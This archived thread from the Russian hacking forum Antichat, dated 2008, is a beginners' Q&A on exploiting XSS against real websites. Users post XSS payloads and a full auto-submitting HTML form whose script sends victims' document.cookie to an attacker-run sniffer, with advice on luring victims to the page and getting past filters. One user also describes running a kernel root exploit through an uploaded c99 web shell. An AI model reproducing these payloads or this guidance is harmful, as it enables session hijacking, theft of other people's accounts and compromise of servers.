ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.08.2008, 16:58
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Три поста назад отвечал на тот же вопрос
https://forum.antichat.ru/showpost.php?p=828862&postcount=3054
Тему лень смотреть?
|
|
|
23.08.2008, 17:10
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
спс  Ну как то да 307 страниц смотреть как то лениво !!!
поиск по форуму зделал не чего не нашел !хм.. оказываеться все так просто как сам не догадался post попробовать видать тупею )
Последний раз редактировалось MaSTeR GэN; 23.08.2008 в 17:12..
|
|
|
|
23.08.2008, 18:29
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код
Код:
><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???
2-Как можно заюзать эту XSS??? она же токо при реге
Последний раз редактировалось diznt; 23.08.2008 в 18:39..
|
|
|
|
23.08.2008, 21:33
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
diznt
это пасивка.. врятле ты стыриш чито куки с этой хсс... т.к. она при реге) куков то еще нету
|
|
|
|
24.08.2008, 00:01
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от diznt
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код
Код:
><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???
2-Как можно заюзать эту XSS??? она же токо при реге Ссыль дай..
P.S sabe Не обяз......даже если так как ты думаешь....то можно составить скрипт..
|
|
|
|
24.08.2008, 01:38
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757
Репутация:
973
|
|
Привет, не подскажете, как запустить сплоит на повышение привилегий в Linux 2.6.22-gentoo-r8 , а то залил шелл (с99), пытаюсь запустить сплойт через шелл, никаких изменений, пытаюсь запустить через www , так показывает только текст сплоита, подскажите пожалуйста , сплоит пытался запустить Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
|
|
|
|
24.08.2008, 01:54
|
|
Новичок
Регистрация: 21.08.2008
Сообщений: 9
Провел на форуме:
118397
Репутация:
0
|
|
Сообщение от diznt
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код
Код:
><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???
2-Как можно заюзать эту XSS??? она же токо при реге
ответ 1:
в поле выплевывает вышеописанную лабуду т.к. ломается html код. зайдя в исходник страницы ты сможешь увидеть почему это происходит (советую скачать например notepad++ он выделит цветом где в коде незакрытые тэги и т.д)
ответ 2
заюзать xss вполне реально и неважно в каком месте сайта оно находиться =) все что нужно это составить html страничку которая будет post запросом передавать полю email соответсвующие параметры. а потом впарить жертве ссылку на эту страницу.
вот ссылка на статью с примером такой странички. там впринципе все написанно достаточно подробно.
т.е ты на своем серваке ставишь:
1. снифер
2. страничку с специально сформированным html кодом.
после чего через личное сообщение,чат или другие средства общения на сайте впариваешь ссылку. человек идет по ссылке и куки твои.
|
|
|
|
24.08.2008, 02:08
|
|
Новичок
Регистрация: 21.08.2008
Сообщений: 9
Провел на форуме:
118397
Репутация:
0
|
|
Вот кстати возникли проблеммы с данной процедурой получения кукисов.
нашел следующее xss на сайте.
в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр
составил html код следующего вида
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();"> <h3>сейчас вы будете перенаправлены</h3>
<form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" ">
<input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'>
</form>
</body>
</html>
сниферить то сниферит но вот только без куков
т.е. в снифере остаеться ip и строка "2222"
пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка? |
|
|
|
24.08.2008, 09:47
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
funnyNe0, скорее всего фильтруется символ "+".
|
|
|
|
24.08.2008, 10:00
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от freddi
funnyNe0, скорее всего фильтруется символ "+".
Тогда проше подгрузить js с другого сайта (<script src=), а там уже все сделать все, что надо.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
